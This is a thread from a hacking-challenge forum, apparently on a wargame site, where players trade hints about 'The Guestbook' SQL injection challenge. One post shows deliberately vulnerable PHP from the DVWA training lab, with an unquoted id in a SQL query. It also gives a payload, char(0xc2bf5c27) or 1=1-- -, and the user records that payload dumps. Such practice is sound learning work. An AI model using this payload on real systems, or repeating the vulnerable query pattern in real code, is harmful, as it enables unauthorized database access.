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The Guesbook  Go to the The Guestbook challenge

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RE: The Guesbook
Google/fordító3Köszönjük!3Értékes üzenet!1Gagyi üzenet! kapcsolás
Another game of "spot the error"... Nice distraction with the indentation. ;)
You're not sending the full request to the server.
Try reformatting your code.
line 14
echo $out1
You're a busy clicker Drool

You might also run into problems with checking eof in combination with HTTP/1.1, because the connection isn't closed immediately.
Utoljára szerkesztette: tehron - Március 06, 2012 - 13:23:15
Globális ranglista: 252
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RE: The Guesbook
Google/fordító1Köszönjük!1Értékes üzenet!0Gagyi üzenet! kapcsolás
Nice post, tehron.

I can see the error you have spotted now as well, and i actually looked for these myself, but it had to be in the last concat of course, when eyes are lazy.

The geeks shall inherit the properties and methods of object earth.
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RE: The Guesbook
Google/fordító0Köszönjük!0Értékes üzenet!0Gagyi üzenet! kapcsolás
Hi Gizmore, I am able to bypass the mysql_escape_string() in my simulation lab (based on DVWA), encoding the '\' but can't bypass your guesbook with the same injection...Can you give us some hint?
Thanks in advance.
Globális ranglista: 252
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RE: The Guesbook
Google/fordító0Köszönjük!0Értékes üzenet!0Gagyi üzenet! kapcsolás
Maybe give us a hint how to bypass mysql_real_escape_string nowadays Euh

I call "impossibru"!

The geeks shall inherit the properties and methods of object earth.
Globális ranglista: 15387
Összpontszám: 79
Üzenetek: 3
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Utoljára it járt: 10é 240n
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RE: The Guesbook
Google/fordító0Köszönjük!0Értékes üzenet!0Gagyi üzenet! kapcsolás
As I said, in DVWA (mysql 5.5):
Code behind:
$id = trim($_GET['id']);
$id = mysql_real_escape_string($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors

Injection chain ID: 0xc2bf5c27 or 1=1-- - (i.e. ¿\' or 1=1-- -, though also works without the ' (0x27)

ID: char(0xc2bf5c27) or 1=1-- -
First name: admin
Surname: admin

ID: char(0xc2bf5c27) or 1=1-- -
First name: Gordon
Surname: Brown

ID: char(0xc2bf5c27) or 1=1-- -
First name: Hack
Surname: Me

ID: char(0xc2bf5c27) or 1=1-- -
First name: Pablo
Surname: Picasso

ID: char(0xc2bf5c27) or 1=1-- -
First name: Bob
Surname: Smith

I am a bit confused about this challenge (I also have been considering a cookie injection but..)
Thanks Smile
Globális ranglista: 252
Összpontszám: 87258
Üzenetek: 1644
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Utoljára it járt: 1n 20ó
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RE: The Guesbook
Google/fordító0Köszönjük!0Értékes üzenet!0Gagyi üzenet! kapcsolás
Maybe you should take a look at the challenge's code Smile
The geeks shall inherit the properties and methods of object earth.
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